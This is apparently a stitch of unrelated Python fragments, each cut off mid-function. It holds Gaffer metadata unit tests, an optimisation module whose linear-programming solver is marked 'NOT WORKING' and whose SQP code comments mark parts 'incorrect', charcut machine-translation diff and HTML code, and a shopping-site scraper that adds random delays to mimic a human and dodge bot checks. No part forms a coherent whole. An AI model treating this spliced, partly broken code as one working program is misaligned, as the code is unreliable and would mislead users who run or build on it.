Gaffer.Metadata.registerNodeValue( n, "imt", "instanceNodeValue" )
Gaffer.Metadata.registerPlugValue( n["op1"], "imt", "instancePlugValue" )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "imt" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( n["op1"], "imt" ), "instancePlugValue" )
Gaffer.Metadata.registerNodeValue( n, "imt", None )
Gaffer.Metadata.registerPlugValue( n["op1"], "imt", None )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "imt" ), "globalNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( n["op1"], "imt" ), "globalPlugValue" )
def testInstanceMetadataUndo( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), None )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), None )
with Gaffer.UndoContext( s ) :
Gaffer.Metadata.registerNodeValue( s["n"], "undoTest", "instanceNodeValue" )
Gaffer.Metadata.registerPlugValue( s["n"]["op1"], "undoTest", "instancePlugValue" )
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue" )
with Gaffer.UndoContext( s ) :
Gaffer.Metadata.registerNodeValue( s["n"], "undoTest", "instanceNodeValue2" )
Gaffer.Metadata.registerPlugValue( s["n"]["op1"], "undoTest", "instancePlugValue2" )
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue2" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue2" )
s.undo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue" )
s.undo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), None )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), None )
s.redo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue" )
s.redo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue2" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue2" )
def testInstanceMetadataSignals( self ) :
n = GafferTest.AddNode()
ncs = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
pcs = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerNodeValue( n, "signalTest", 1 )
Gaffer.Metadata.registerPlugValue( n["op1"], "signalTest", 1 )
self.assertEqual( len( ncs ), 1 )
self.assertEqual( len( pcs ), 1 )
self.assertEqual( ncs[0], ( GafferTest.AddNode.staticTypeId(), "signalTest" ) )
self.assertEqual( pcs[0], ( GafferTest.AddNode.staticTypeId(), "op1", "signalTest" ) )
Gaffer.Metadata.registerNodeValue( n, "signalTest", 1 )
Gaffer.Metadata.registerPlugValue( n["op1"], "signalTest", 1 )
self.assertEqual( len( ncs ), 1 )
self.assertEqual( len( pcs ), 1 )
Gaffer.Metadata.registerNodeValue( n, "signalTest", 2 )
Gaffer.Metadata.registerPlugValue( n["op1"], "signalTest", 2 )
self.assertEqual( len( ncs ), 2 )
self.assertEqual( len( pcs ), 2 )
self.assertEqual( ncs[1], ( GafferTest.AddNode.staticTypeId(), "signalTest" ) )
self.assertEqual( pcs[1], ( GafferTest.AddNode.staticTypeId(), "op1", "signalTest" ) )
def testSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
Gaffer.Metadata.registerNodeValue( s["n"], "serialisationTest", 1 )
Gaffer.Metadata.registerPlugValue( s["n"]["op1"], "serialisationTest", 2 )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual( Gaffer.Metadata.nodeValue( s2["n"], "serialisationTest" ), 1 )
self.assertEqual( Gaffer.Metadata.plugValue( s2["n"]["op1"], "serialisationTest" ), 2 )
def testStringSerialisationWithNewlinesAndQuotes( self ) :
trickyStrings = [
"Paragraph 1\n\nParagraph 2",
"'Quote'",
"Apostrophe's",
'"Double quote"',
]
script = Gaffer.ScriptNode()
script["n"] = Gaffer.Node()
for s in trickyStrings :
p = Gaffer.IntPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
script["n"]["user"].addChild( p )
Gaffer.Metadata.registerPlugValue( p, "description", s )
script2 = Gaffer.ScriptNode()
script2.execute( script.serialise() )
for p, s in zip( script2["n"]["user"].children(), trickyStrings ) :
self.assertEqual( Gaffer.Metadata.plugDescription( p ), s )
def testRegisteredValues( self ) :
n = GafferTest.AddNode()
self.assertTrue( "r" not in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rp" not in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "ri" not in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" not in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
Gaffer.Metadata.registerNodeValue( n.staticTypeId(), "r", 10 )
Gaffer.Metadata.registerPlugValue( n.staticTypeId(), "op1", "rp", 20 )
self.assertTrue( "r" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rp" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "ri" not in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" not in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
Gaffer.Metadata.registerNodeValue( n, "ri", 10 )
Gaffer.Metadata.registerPlugValue( n["op1"], "rpi", 20 )
self.assertTrue( "r" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rp" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "ri" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "r" not in Gaffer.Metadata.registeredNodeValues( n, instanceOnly=True ) )
self.assertTrue( "rp" not in Gaffer.Metadata.registeredPlugValues( n["op1"], instanceOnly=True ) )
self.assertTrue( "ri" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
def testInstanceDestruction( self ) :
for i in range( 0, 1000 ) :
p = Gaffer.Plug()
n = Gaffer.Node()
self.assertEqual( Gaffer.Metadata.plugValue( p, "destructionTest" ), None )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "destructionTest" ), None )
Gaffer.Metadata.registerPlugValue( p, "destructionTest", 10 )
Gaffer.Metadata.registerNodeValue( n, "destructionTest", 20 )
self.assertEqual( Gaffer.Metadata.plugValue( p, "destructionTest" ), 10 )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "destructionTest" ), 20 )
del p
del n
def testOrder( self ) :
class MetadataTestNodeA( Gaffer.Node ) :
def __init__( self, name = "MetadataTestNodeOne" ) :
Gaffer.Node.__init__( self, name )
self["a"] = Gaffer.IntPlug()
IECore.registerRunTimeTyped( MetadataTestNodeA )
class MetadataTestNodeB( MetadataTestNodeA ) :
def __init__( self, name = "MetadataTestNodeOne" ) :
MetadataTestNodeA.__init__( self, name )
import copy
import numpy as np
import numpy.linalg as la
from scipy.optimize import linprog # TODO: REMOVE
from _errors import ConvergenceError
# ======================================================================================================================
# Root-finding Methods
# ======================================================================================================================
def secant(fun, x0, x1, args=()):
# options ----------------------------------------------------------------------------------------------------------
max_it = 1000
tol = 1e-3
# initializing loop ------------------------------------------------------------------------------------------------
it = 0
root = x1
# iterating --------------------------------------------------------------------------------------------------------
while abs(x1 - x0) > tol and it < max_it:
f0 = fun(x0, *args)
f1 = fun(x1, *args)
root -= f1 * (root - x0) / (f1 - f0)
if not np.isfinite(root):
raise ConvergenceError('division by zero')
x0 = x1
x1 = root
it += 1
return root
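# Illustrative usage sketch (added for clarity; the helper name is hypothetical and
# not part of the original module): approximate sqrt(2) with the secant method.
def _secant_example():
    # f(x) = x**2 - 2 has its positive root at sqrt(2); start from x0=1 and x1=2.
    return secant(lambda x: x ** 2. - 2., 1., 2.)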
# ======================================================================================================================
# Least Squares Methods
# ======================================================================================================================
def residual(f, x, y, p, args=()):
return y - f(x, *p, *args)
def lsq_obj(r):
return 0.5 * la.norm(r) ** 2.
def d_lsq_obj(r, j):
return j.T @ r
def jacobian_fd(x, p, f, args=()):
m = len(p)
j = [None for _ in range(0, m)]
eps = 1e-8
fx = f(x, *p, *args)
for i in range(0, m):
p_ = copy.deepcopy(list(p))
p_[i] += eps
j[i] = (f(x, *p_, *args) - fx) / eps
return np.asarray(j).T
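# Illustrative usage sketch (added for clarity; the helper name is hypothetical and
# not part of the original module): for the linear model f(x, a, b) = a*x + b the
# exact Jacobian columns are x and 1, so the forward-difference estimate should
# reproduce them to within the 1e-8 step size used above.
def _jacobian_fd_example():
    x = np.array([0., 1., 2.])
    return jacobian_fd(x, (2., 1.), lambda xx, a, b: a * xx + b)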
def nl_lsq(fun, x, y, p0, jac=None, args=()):
# options ----------------------------------------------------------------------------------------------------------
max_it = 1000
max_it_bt = 100
tol = 1e-3
rho = 0.5
c = 1e-4
if jac is None:
jac = lambda xj, *pj: jacobian_fd(xj, pj, fun, args=args)
# initializing loop ------------------------------------------------------------------------------------------------
it = 0
converged = False
p = p0
res = residual(fun, x, y, p, args=args)
j = jac(x, *p, *args)
f = lsq_obj(res)
df = d_lsq_obj(res, j)
# iterating --------------------------------------------------------------------------------------------------------
while not converged and it < max_it:
# calculate optimized step
try:
q, r = la.qr(j)
dp = la.solve(r, q.T @ res)
except np.linalg.LinAlgError:
raise ConvergenceError('Unable to find a solution due to singular matrix issues')
# invoke backtracking
alpha = 1.
it_bt = 0
p_bt = p + dp
f_bt = lsq_obj(residual(fun, x, y, p_bt, args=args))
csdf = -c * np.dot(dp, df)
while f_bt >= (f + alpha * csdf) and it_bt < max_it_bt:
p_bt = p + alpha * dp
f_bt = lsq_obj(residual(fun, x, y, p_bt, args=args))
alpha *= rho
it_bt += 1
p = p_bt
# update parameters and check convergence
res = residual(fun, x, y, p, args=args)
f = lsq_obj(res)
j = jac(x, *p_bt, *args)
df = d_lsq_obj(res, j)
if la.norm(df, np.inf) < tol:
converged = True
it += 1
if it == max_it:
raise ConvergenceError('Solver failed to converge within maximum number of iterations')
return p
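# Illustrative usage sketch (added for clarity; the helper name is hypothetical and
# not part of the original module): a linear model y = a*x + b is the simplest
# smoke test, since the QR-based Gauss-Newton step above recovers the true
# parameters (2.0, 1.0) in a single iteration on noise-free data.
def _nl_lsq_example():
    model = lambda xm, a, b: a * xm + b
    x = np.linspace(0., 5., 50)
    y = model(x, 2., 1.)
    return nl_lsq(model, x, y, p0=np.array([0., 0.]))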
# ======================================================================================================================
# Linear Programming Methods
# ======================================================================================================================
def lin_ip(A, g, b):
"""
TODO: NOT WORKING
# Algorithm 14.3, Page 411 Nocedal & Wright
Parameters
----------
A : array_like
system matrix of the constraints
g : array_like
objective function multiplier
b : array_like
right-hand side of the constraints
Returns
-------
array_like
optimal solution vector
"""
converged = False
m, n = A.shape
max_iter = 10
iter_ = 0
eta = 0.99
# initial value correction heuristic -------------------------------------------------------------------------------
AA = A @ A.T
x_t = A.T @ la.solve(AA, b)
l_t = la.solve(AA, A @ g)
s_t = g - A.T @ l_t
dx = max(-1.5 * x_t.min(), 0.)
ds = max(-1.5 * s_t.min(), 0.)
x_h = x_t + dx
s_h = s_t + ds
xhsh = x_h.T @ s_h
dx_h = .5 * xhsh / (np.sum(s_h))
ds_h = .5 * xhsh / (np.sum(x_h))
x = x_h + dx_h
l = l_t
s = s_h + ds_h
# main loop --------------------------------------------------------------------------------------------------------
r_c = A.T @ l + s - g
r_b = A @ x - b
mu = (x.T @ s) / n
while (not converged) and (iter_ < max_iter):
iter_ = iter_ + 1
# KKT system
kkt = np.block([[np.zeros((n, n)), A.T, np.eye(n)],
[A, np.zeros((m, m)), np.zeros((m, n))],
[np.diag(s.flatten()), np.zeros((n, m)), np.diag(x.flatten())]])
rhs = np.vstack((-r_c, -r_b, -x * s))
# Solving for and extracting affine variables
# QR decompose KKT matrix, TODO: LDL decomposition instead
q, r = la.qr(kkt)
dv_aff = la.solve(r, q.T @ rhs)
dx_aff = dv_aff[:n]
ds_aff = dv_aff[(n + m):]
# Determining indices and corresponding alpha for affine variables
alpha_prim_aff = np.where(dx_aff < 0., -x / dx_aff, 1.).min()
alpha_dual_aff = np.where(ds_aff < 0., -s / ds_aff, 1.).min()
# Calculating affine mu, mu and sigma
mu_aff = ((x + alpha_prim_aff * dx_aff).T @ (s + alpha_dual_aff * ds_aff)) / n
sigma = (mu_aff / mu) ** 3. if mu > 1.e-10 else 0.
rhs = np.vstack((-r_c, -r_b, -x * s - dx_aff * ds_aff + sigma * mu))
# Solving for and extracting increments
dv = la.solve(r, q.T @ rhs)
dx = dv[:n]
dl = dv[n:(n + m)]
ds = dv[(n + m):]
# Determining indices and corresponding alpha for x and s
alpha_prim = np.where(dx < 0., eta * (-x / dx), 1.).min()
alpha_dual = np.where(ds < 0., eta * (-s / ds), 1.).min()
# updating x, l and s
x += alpha_prim * dx
l += alpha_dual * dl
s += alpha_dual * ds
print('X')
print(x)
# convergence check
r_c = A.T @ l + s - g
r_b = A @ x - b
mu = (x.T @ s) / n
converged = (la.norm(r_c, ord=np.inf) <= 1.e-9) and (la.norm(r_b, ord=np.inf) <= 1.e-9) and (abs(mu) <= 1.e-9)
print('CONVERGENCE')
print('rC', la.norm(r_c, ord=np.inf))
print('rA', la.norm(r_b, ord=np.inf))
print('mu', abs(mu))
return x
# ======================================================================================================================
# Quadratic Programming Methods
# ======================================================================================================================
def nl_sqp(obj, con, x0, H0):
"""
Non-linear SQP solver for inequality constrained problems
TODO: Implement equality constraints
:param obj:
:param con:
:param x0:
:param H0:
:return:
"""
# Options ----------------------------------------------------------------------------------------------------------
tol = 1.0e-3
max_iter = 300
n = x0.shape[0]
# calculating objective function and constraint function using a numerical approximation for Jacobians
xeval = x0
f, df = obj(xeval)
c, dc = con(xeval)
m = c.size
mu = 100.
# assembling KKT system
A = np.zeros((n + m, 0)) # incorrect, assemble for equality constraints
b = np.zeros(0) # incorrect, assemble for equality constraints
H = np.block([[np.zeros(H0.shape), np.zeros((H0.shape[0], m))], [np.zeros((m, H0.shape[1])), np.eye(m) * 1e-6]])
g = np.block([np.zeros((df.shape[0], 1)), np.zeros((m, 1))])
y = np.zeros(0)
C = np.block([[np.zeros(dc.shape), np.zeros((m, m))], [np.zeros((m, n)), np.eye(m)]])
d = np.zeros(2 * m)
B = H0
z = np.abs(la.solve(dc, df))
s = np.ones(2 * m)
dLold = df - dc @ z
# Main loop iterations ---------------------------------------------------------------------------------------------
converged = (la.norm(dLold, ord=np.inf) < tol) and (la.norm(z * c, ord=np.inf) < tol) # z * c element wise
rho = 0.5
iter = 0
while (not converged) and (iter < max_iter):
# Updating initial guess input for the PDPCIP algorithm
H[:n, :n] = B
g = np.block([df, mu * np.ones(m)])
# TODO: Missing the equality constrains here?
C[:m, :m] = dc
d[:m] = -c
zpad = np.block([z, np.ones(m)])
t = np.maximum(-(c + dc @ xeval), np.zeros(m))
xt = np.block([xeval, t])
# Sub problem: Solve constrained QP
p, y, z, _ = quad_ip(H, g, A, b, C, d, xt, y, s, zpad)
xeval = xt[:n]
z = z[:n]
p = p[:n]
# Take step
xeval += p
# Function evaluation
f, df = obj(xeval)
c, dc = con(xeval)
mu = (df.T @ p + 0.5 * p.T @ B @ p) / ((1. - rho) * la.norm(c, ord=1))
# Lagrangian gradient, z used for inequality constraints
dLnew = df - dc @ z
# BFGS Hessian update
q = dLnew - dLold
Bp = B @ p
if np.dot(p, q) >= 0.2 * np.dot(p, Bp):
theta = 1.
else:
theta = (0.8 * np.dot(p, Bp)) / (np.dot(p, Bp) - np.dot(p, q))
r = theta * q + (1. - theta) * Bp
r = r.reshape((r.shape[0], 1))
Bp = Bp.reshape((Bp.shape[0], 1))
B += r @ r.T / np.dot(p, r) - Bp @ Bp.T / np.dot(p, Bp)
dLold = dLnew
iter += 1
converged = (la.norm(dLold, np.inf) < tol) and (la.norm(z * c, np.inf) < tol) # z * c element wise
info = converged
zopt = z[:2]
xopt = xeval
return xopt, zopt, info
def quad_ip(H, g, A, b, C,
def residual_diff(mask):
    """
    Yield runs of characters not yet covered by a match (marked with 1 in the mask) as pairs:
    (start position, length)
    """
buf = []
for i, elt in enumerate(mask):
if elt:
buf.append(i)
elif buf:
yield buf[0], len(buf)
buf = []
if buf:
yield buf[0], len(buf)
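# Illustrative usage sketch (added for clarity; the helper name is hypothetical and
# not part of the original module): a mask of [0, 1, 1, 0, 1] contains two runs of
# uncovered characters, starting at positions 1 (length 2) and 4 (length 1).
def _residual_diff_example():
    return list(residual_diff([0, 1, 1, 0, 1]))  # -> [(1, 2), (4, 1)]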
def greedy_matching(seq1, seq2, min_match_size):
"""
Greedy search for common substrings between seq1 and seq2.
Residual substrings (smaller than min_match_size) are also output as deletions (from seq1)
or insertions (into seq2).
Returns an iterator over triples: (position in seq1, position in seq2, substring)
The position in seq1 is -1 for insertions, and the position in seq2 is -1 for deletions.
"""
assert min_match_size > 0
retained_matches = []
# Indicate for each character if it is already covered by a match
mask1 = [1] * len(seq1)
mask2 = [1] * len(seq2)
# List *all* common substrings and sort them (mainly) by length.
# This is fine since we do (should) not deal with huge strings.
match_it = chain(word_based_matches(seq1, seq2, min_match_size),
char_based_matches(seq1, seq2, min_match_size))
dedup = {match[0]: match for match in match_it}
match_list = sorted(dedup.values(), key=order_key)
# Consume all common substrings, longest first
while match_list:
substr, pos1, pos2 = match_list[0]
i, j = pos1[0], pos2[0]
retained_matches.append((i, j, substr))
size = len(substr)
# Update masks with newly retained characters
mask1[i:i+size] = [0] * size
mask2[j:j+size] = [0] * size
# Eliminate common substrings for which at least one char is already covered
match_list = list(clean_match_list(match_list, mask1, mask2))
# Output matches
for match in retained_matches:
yield match
# Output deletions
for pos, size in residual_diff(mask1):
yield pos, -1, seq1[pos:pos + size]
# Output insertions
for pos, size in residual_diff(mask2):
yield -1, pos, seq2[pos:pos + size]
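# Illustrative usage sketch (added for clarity; the helper name and example strings are
# hypothetical, not part of the original module): each yielded triple is either a common
# substring (both positions >= 0), a deletion from seq1 (second position == -1) or an
# insertion into seq2 (first position == -1).
def _greedy_matching_example():
    return list(greedy_matching(u"the black cat", u"the white cat", 3))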
def find_regular_matches(ops):
"""
Find the set of regular (non-shift) matches from the list of operations.
"ops" is the list of triples as returned by greedy_matching().
"""
matches1 = sorted(m for m in ops if m[0] != -1 and m[1] != -1)
matches2 = sorted(matches1, key=lambda match: match[1])
# Search for the longest common subsequence in characters
# Expand "string" matches into "character" matches
char_matches1 = [(m, i) for m in matches1 for i in range(len(m[2]))]
char_matches2 = [(m, i) for m in matches2 for i in range(len(m[2]))]
sm = difflib.SequenceMatcher(None, char_matches1, char_matches2, autojunk=False)
return {m for a, _, size in sm.get_matching_blocks()
for m, _ in char_matches1[a:a + size]}
def eval_shift_distance(shift, reg_matches):
"""
Compute the distance in characters a match has been shifted over.
"reg_matches" is the set of regular matches as returned by find_regular_matches().
The distance is defined as the number of characters between the shifted match
and the closest regular match.
"""
mid_matches = sorted(m for m in reg_matches
if (m[0] < shift[0] and m[1] > shift[1])
or (m[0] > shift[0] and m[1] < shift[1]))
return (-(shift[0] - mid_matches[0][0])
if mid_matches[0][0] < shift[0]
else (mid_matches[-1][0] + len(mid_matches[-1][2])
- (shift[0] + len(shift[2]))))
def add_shift_distance(ops, reg_matches):
"""
Decorate the list of operations with the shift distance.
The distance is 0 for everything but shifts.
Returns an iterator over 4-tuples:
(pos in seq1, pos in seq2, substring, integer distance)
"""
# Experimental: turn shifts back into insertions/deletions
# if the shift distance is "too large".
for op in ops:
alo, blo, slice = op
if alo == -1 or blo == -1 or op in reg_matches:
yield op + (0,)
else: # shift
dist = eval_shift_distance(op, reg_matches)
# Heuristic: the shorter a string,
# the shorter the distance it is allowed to travel
if math.exp(len(slice)) >= abs(dist):
yield op + (dist,)
else: # replace shift with deletion + insertion
yield -1, blo, slice, 0
yield alo, -1, slice, 0
def _merge_adjacent_diffs_aux(diffs):
prev_start = 0
prev_substr = u''
for start, substr in diffs:
if start == prev_start + len(prev_substr):
prev_substr += substr
else:
if prev_substr:
yield prev_start, prev_substr
prev_start = start
prev_substr = substr
if prev_substr:
yield prev_start, prev_substr
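# Illustrative usage sketch (added for clarity; the helper name is hypothetical and
# not part of the original module): adjacent diffs are merged, others kept apart.
def _merge_adjacent_diffs_aux_example():
    # (0, 'ab') and (2, 'cd') touch and are merged; (7, 'x') stays separate.
    return list(_merge_adjacent_diffs_aux([(0, u'ab'), (2, u'cd'), (7, u'x')]))  # -> [(0, u'abcd'), (7, u'x')]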
def merge_adjacent_diffs(ops):
"""Final cleaning: merge adjacent deletions or insertions into a single operation."""
matches = [op for op in ops if op[0] != -1 and op[1] != -1]
deletions = sorted((alo, substr) for alo, blo, substr, _ in ops if blo == -1)
insertions = sorted((blo, substr) for alo, blo, substr, _ in ops if alo == -1)
for op in matches:
yield op
for alo, substr in _merge_adjacent_diffs_aux(deletions):
yield alo, -1, substr, 0
for blo, substr in _merge_adjacent_diffs_aux(insertions):
yield -1, blo, substr, 0
def add_css_classes(ops):
"""
Decorate the list of operations with CSS classes for display.
Each operation is assigned 2 classes:
* {ins,del,shift,match} for the display style
* {diff,shift,match}X serve as ids for mouse-overs (substrings that match
in the two segments compared have the same id)
Returns an iterator over 6-tuples:
(pos in seq1, pos in seq2, substring, distance, css class, css id)
"""
# Substrings are identified based on their start index in the first sequence
match_alo = 0
for op in ops:
alo, blo, _, dist = op
if alo == -1:
yield op + ('ins', 'diff{}'.format(match_alo))
elif blo == -1:
yield op + ('del', 'diff{}'.format(match_alo))
elif dist:
yield op + ('shift', 'shift{}'.format(alo))
else:
yield op + ('match', 'match{}'.format(alo))
match_alo = alo
def compare_segments(cand, ref, min_match_size):
"""
Main segment comparison function.
cand and ref are the original unicode strings.
Return a pair of operation list (same 6-tuples as returned by add_css_classes())
"""
base_ops = list(greedy_matching(cand, ref, min_match_size))
reg_matches = find_regular_matches(base_ops)
clean_ops = list(merge_adjacent_diffs(list(add_shift_distance(base_ops, reg_matches))))
cand_ops = sorted(op for op in clean_ops if op[0] != -1)
ref_ops = sorted((op for op in clean_ops if op[1] != -1), key=itemgetter(1))
styled_cand = list(add_css_classes(cand_ops))
styled_ref = list(add_css_classes(ref_ops))
return styled_cand, styled_ref
def _get_cost(styled_ops, css_clazz):
return sum(len(slice) for _, _, slice, _, clazz, _ in styled_ops
if clazz == css_clazz)
def score_all(aligned_segs, styled_ops, alt_norm):
"""Score segment pairs based on their differences."""
for ((seg_id, _, src, cand, ref), (styled_cand, styled_ref)) in zip(aligned_segs, styled_ops):
ins_cost = _get_cost(styled_cand, 'del')
del_cost = _get_cost(styled_ref, 'ins')
# shifts are the same in cand and ref
shift_cost = _get_cost(styled_cand, 'shift')
cost = ins_cost + del_cost + shift_cost
div = 2 * len(cand) if alt_norm else len(cand) + len(ref)
# Prevent scores > 100%
bounded_cost = min(cost, div)
yield bounded_cost, div
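# Illustrative usage sketch (added for clarity; the helper name and example strings
# are hypothetical, not part of the original module): compare one candidate/reference
# pair and derive its score from the insertion, deletion and shift costs, using the
# default normalisation len(cand) + len(ref).
def _score_example(cand=u"the cat sat on the mat", ref=u"the cat sat on a mat", min_match_size=3):
    styled_cand, styled_ref = compare_segments(cand, ref, min_match_size)
    cost = (_get_cost(styled_cand, 'del')
            + _get_cost(styled_ref, 'ins')
            + _get_cost(styled_cand, 'shift'))
    div = len(cand) + len(ref)
    return min(cost, div) / float(div)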
def ops2html(styled_ops, seg_id):
for op in styled_ops:
_, _, slice, dist, css, css_id = op
substr_id = 'seg{}_{}'.format(seg_id, css_id)
dist_str = '({:+d})'.format(dist) if dist else ''
slice_len = len(slice)
yield '<span title="{css}{dist_str}: {slice_len}" class="{css} {substr_id}" ' \
'onmouseenter="enter(\'{substr_id}\')" onmouseleave="leave(\'{substr_id}\')">' \
'{slice}</span>'.format(**locals())
seg_counter = 0
def segs2html(segs, ops, score_pair, mt_label="MT:", ref_label="Ref:", use_id_col=True):
"""Do highlighting on a single segment pair."""
global seg_counter
seg_counter += 1
seg_id, origin, src, cand, ref = segs
styled_cand, styled_ref = ops
cost, div = score_pair
score = (1.*cost/div) if div else 0
origin_str = '<p class="detail">({})</p>'.format(origin) if origin else ''
src_str = '''<tr>
<td class="seghead midrow">Src:</td>
<td class="midrow src">{}</td>
</tr>'''.format(src) if src else ''
cand_str = ''.join(ops2html(styled_cand, seg_counter))
ref_str = ''.join(ops2html(styled_ref, seg_counter))
id_row = ""
if use_id_col: id_row = '<td class="mainrow">{origin_str}{seg_id}</td>'.format(**locals())
return '''
<tr>
{id_row}
<td class="mainrow score">
<span class="detail">{cost:.0f}/{div:.0f}=</span><br/>{score:.0%}
</td>
<td class="mainrow">
<table>
{src_str}
<tr>
<td class="seghead midrow">{mt_label}</td>
<td class="midrow trg">
{cand_str}
</td>
</tr>
<tr>
<td class="seghead">{ref_label}</td><td class="trg">
{ref_str}
</td>
</tr>
</table>
</td>
</tr>
'''.format(**locals())
def html_dump(out_file, aligned_segs, styled_ops, seg_scores, doc_cost, doc_div):
"""
Do highlighting on all segments and output them as a HTML file.
aligned_segs are the input segments as returned by load_input_segs().
styled_ops are the decorated operations as returned by compare_segments().
seg_scores are the pairs (cost, div) as returned by score_all().
"""
print('''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>charcut output</title>
<style>
body {font-family: sans-serif; font-size: 11pt;}
table, td, th {border-spacing: 0;}
th {padding: 10px;}
td {padding: 5px;}
th {border-top: solid black 2px; font-weight: normal;}
.tophead {border-bottom: solid black 1px;}
.src {font-style: oblique;}
.trg {font-family: Consolas, monospace;}
.del {font-weight: bold; color: #f00000;}
.ins {font-weight: bold; color: #0040ff;}
.shift {font-weight: bold;}
.match {}
.mainrow {border-top: solid black 1px; padding: 1em;}
.midrow {border-bottom: dotted gray 1px;}
.seghead {color: gray; text-align: right;}
.score {font-family: Consolas, monospace; text-align: right; font-size: large;}
.detail {font-size: xx-small; color: gray;}
</style>
<script>
function enter(cls) {
var elts = document.getElementsByClassName(cls);
for (var i=0; i<elts.length; i++)
elts[i].style.backgroundColor
Please wait... \n")
for i in range(0, 1):
browser.reload()
time.sleep(2)
browser.back()
print("Sleeping for 30 seconds to emulate humans. \n")
time.sleep(30)
browser.forward()
playsound('./sounds/break_pedal.wav')
break_pedal_ayh = input("Please click a laptop item, and add or remove it from the cart, and go back to the same page using the back button of your browser. \n Then enter in any key and press enter to continue scraping. \n")
# Allocate time for page to load.
time.sleep(3)
print("Targeting new url... ")
# After user passes test, target the new url, and return updated target_page_soup.
target_url = browser.url
response_target = requests.get(target_url)
target_page_soup = soup(response_target.text, 'html.parser')
# Recursively call the function, and if it passes, continue on with the program.
are_you_human_backend(target_page_soup)
else:
print("Passed the 'Are you human?' check when requesting and parsing the html. Continuing with scrape ... \n")
# Otherwise, return the target_page_soup that was passed in.
return target_page_soup
# In[12]:
# Idea for later: put the links in a list, then loop through them with try/except/else (break out of the loop) and continue.
def random_xpath_top_bottom():
x = random.randint(3, 8)
def rdm_slp_3_8(x):
time.sleep(x)
print(f"Slept for {x} seconds. \n")
return x
coin_toss_top_bottom = random.randint(0,1)
next_page_button_results = []
# If the coin toss is even, mouse_over and click the top page link.
if (coin_toss_top_bottom == 0):
try:
print('Heads - Clicking "Next Page" Top Button. \n')
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_3_8(x)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').mouse_over()
time.sleep(1)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[1]/div[2]/div/div[2]/button').click()
next_page_button_results.append(coin_toss_top_bottom)
print('Heads - SUCCESSFUL "Next Page" Top Button. \n')
return
except:
print("EXCEPTION - Top Next Page button mouse over and click UNSUCCESSFUL... ")
try:
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_3_8(x)
print('Attempting to click the bottom "Next Page" Xpath Bottom Button. \n')
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').mouse_over()
time.sleep(4)
browser.find_by_xpath('/html/body/div[4]/section/div/div/div[2]/div/div/div/div[2]/div[1]/div[2]/div[4]/div/div/div[11]/button').click()
print('EXCEPTION BYPASSED - Bottom Next Page Button SUCCESSFUL! \n')
except:
print("EXCEPTION - Top and Bottom Next Page Button Link not working... \n")
playsound('./sounds/break_pedal.wav')
break_pedal_xptb = input("Break Pedal - Please manually click next page. Then enter in any key and press enter to continue the scrape. \n ")
print("Continuing... \n")
print("="*60)
return
else: # If coin toss is tails or 1, then...
try:
print('Tails - Clicking "Next Page" Xpath Bottom Button. \n')
x = random.randint(3, 8)
print(f"Mimic human behavior by randomly sleeping for {x}. \n")
rdm_slp_3_8(x)
